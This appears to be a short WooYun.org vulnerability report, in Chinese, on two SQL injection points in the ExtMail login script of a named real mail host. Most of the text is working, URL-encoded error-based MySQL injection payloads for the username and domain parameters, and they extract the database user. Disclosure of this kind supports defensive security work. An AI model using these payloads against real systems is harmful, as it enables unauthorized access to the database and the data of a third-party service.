WooYun.org

不知道重复了没，2 处 注入
https://mail.readnovel.com/extmail/cgi/index.cgi
参数 username
bakecookie=on&domain=1&nosameip=on&password=myPassw0rd&username='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(user())%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'
参数 domain
bakecookie=on&domain='and(select%201%20from(select%20count(*)%2cconcat((select%20concat(user())%20from%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&nosameip=on&password=myPassw0rd&username=aaaaaa